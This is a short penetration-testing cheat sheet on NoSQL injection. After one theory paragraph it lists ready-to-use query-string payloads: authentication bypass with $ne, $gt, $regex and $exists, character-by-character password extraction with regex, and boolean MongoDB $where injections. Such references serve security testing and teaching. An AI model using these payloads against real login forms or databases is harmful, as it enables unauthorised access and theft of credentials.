Infiltr8 Forum GitHub

NoSQL Injection

Theory

NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.

Practice

Authentication Bypass

Using not equal ($ne) or greater ($gt) we can try to bypass authentication

username[$ne]=toto&password[$ne]=toto          #Not Equal
username[$regex]=.*&password[$regex]=.*        #Regex
username[$exists]=true&password[$exists]=true  #If Exist
username[$ne]=admin&password[$gt]=0            #Greater

Extract data

We can use regex to find the length of a value

username[$regex]=.{25}&pass[$ne]=1

We can use regex to extract information.

username[$eq]=admin&password[$regex]=^p
username[$eq]=admin&password[$regex]=^pa
username[$eq]=admin&password[$regex]=^pas

username[$ne]=toto&password[$regex]=^p
username[$ne]=toto&password[$regex]=^pa
username[$ne]=toto&password[$regex]=^pas

We can use $nin (not in) if you don't want to match with some values.

#<Matches non of the values of the array> (not test and not admin)
username[$nin][admin]=admin&username[$nin][test]=test&password[$regex]=^p

MangoDB Injection

You may try to make boolean based injection on MongoDB with following payloads

, $where: '1 == 1'
$where: '1 == 1'
' || 1==1//
' || 1==1%00

Resources

Last updated